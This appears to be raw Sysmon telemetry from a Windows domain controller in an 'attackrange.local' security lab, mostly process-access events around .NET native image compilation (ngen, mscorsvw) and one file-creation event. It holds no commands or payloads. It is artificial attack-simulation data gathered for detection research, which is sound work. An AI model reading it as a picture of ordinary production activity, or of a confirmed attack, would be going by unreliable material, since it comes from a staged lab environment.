13:25:44.009{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4658-6000-0404-000000009A01}4132C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008162Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:43.994{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4658-6000-0404-000000009A01}4132C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008161Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:43.994{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4658-6000-0404-000000009A01}4132C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008215Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:45.947{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4659-6000-1504-000000009A01}3368C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008214Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:45.931{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-4659-6000-1504-000000009A01}3368C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008213Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:45.931{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4659-6000-1504-000000009A01}3368C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008212Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:45.884{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4659-6000-1404-000000009A01}1172C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008211Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:45.869{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4659-6000-1404-000000009A01}1172C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008210Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:45.869{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4659-6000-1404-000000009A01}1172C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008209Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:45.837{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4659-6000-1304-000000009A01}5108C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008208Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:45.822{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4659-6000-1304-000000009A01}5108C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008207Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:45.822{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4659-6000-1304-000000009A01}5108C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008206Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:45.759{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4659-6000-1204-000000009A01}4428C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008205Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:45.744{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4659-6000-1204-000000009A01}4428C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008204Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:45.744{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4659-6000-1204-000000009A01}4428C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008203Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:45.697{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4659-6000-1104-000000009A01}4788C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008202Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:45.681{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4659-6000-1104-000000009A01}4788C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008201Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:45.681{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4659-6000-1104-000000009A01}4788C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008200Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localEXE2021-01-14 13:25:45.619{08A6967A-4659-6000-1004-000000009A01}4176C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1050-0\Microsoft.Workflow.Compiler.exe2021-01-14 13:25:45.619 10341000x80000000000000008199Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:45.509{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4659-6000-1004-000000009A01}4176C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008198Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:45.494{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4659-6000-1004-000000009A01}4176C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008197Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:45.494{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4659-6000-1004-000000009A01}4176C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008196Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:45.322{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4659-6000-0F04-000000009A01}3888C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008195Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:45.306{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4659-6000-0F04-000000009A01}3888C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008194Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:45.306{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4659-6000-0F04-000000009A01}3888C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.